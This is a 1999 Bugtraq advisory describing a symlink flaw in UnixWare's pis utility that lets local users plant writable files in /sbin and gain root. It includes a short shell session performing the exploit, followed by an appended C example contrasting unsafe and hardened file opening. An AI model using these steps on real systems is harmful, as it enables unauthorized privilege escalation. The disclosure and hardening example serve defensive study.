Bugtraq mailing list archives
UnixWare local pis exploit
From: btellier () USA NET (Brock Tellier)
Date: Mon, 27 Dec 1999 20:37:01 MST
Greetings,

OVERVIEW

A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any user to create arbitrary files with group "sys" privileges. A full root compromise is then trivial.

BACKGROUND

As usual, I've only tested UnixWare 7.1.

DETAILS

By creating a symlink between /tmp/pisdata and any sys-owned file we can overwrite that file with ps output. If we point the symlink at a non-existent file in a directory which we can write to (such as, say, /sbin/ls), pis will create this file mode 666 owned by us, group of sys.

This is a fairly simple compromise. /sbin is writable by group sys. We can create files in /sbin owned by us. And root's default $PATH starts with /sbin.

EXPLOIT

bash-2.02$ ls -dal /sbin
drwxrwxr-x 2 root sys 3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw- 1 xnec sys 5896 Dec 28 08:28 /sbin/xnec
bash-2.02$

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net
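Added example, not part of the original post and not SCO's code: the class of bug described above is a privileged program opening a fixed name in /tmp with a creating open that follows symlinks. The sketch below assumes that pattern (the post does not show how pis opens /tmp/pisdata) and compares it with an exclusive, no-follow open; the function names and the scratch directory are hypothetical, and the symlink is planted only inside a private mkdtemp() directory.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* for mkdtemp(), symlink(), O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed vulnerable pattern: follows a symlink and creates whatever it points at. */
static int open_naive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened: O_EXCL fails with EEXIST if the name already exists, including a
 * dangling symlink; O_NOFOLLOW refuses a symlink; mode is owner-only. */
static int open_hardened(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Plant <dir>/pisdata -> <dir>/target (constructed names), call the opener on
 * the link, and return 1 if the target was created, 0 if not, -1 on setup error. */
static int target_created_via_symlink(int (*opener)(const char *))
{
    char dir[] = "/tmp/pisdemo.XXXXXX";
    char link_path[64], target[64];
    struct stat st;
    int fd, created;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link_path, sizeof link_path, "%s/pisdata", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, link_path) != 0) { rmdir(dir); return -1; }
    fd = opener(link_path);
    if (fd >= 0) close(fd);
    created = (stat(target, &st) == 0);
    unlink(target);          /* clean up; fails harmlessly if never created */
    unlink(link_path);
    rmdir(dir);
    return created;
}

int main(void)
{
    printf("naive:    target created = %d\n", target_created_via_symlink(open_naive));
    printf("hardened: target created = %d\n", target_created_via_symlink(open_hardened));
    return 0;
}
```

A setgid program should also drop its extra group before writing user-influenced scratch files, or keep them in a directory only it can write to.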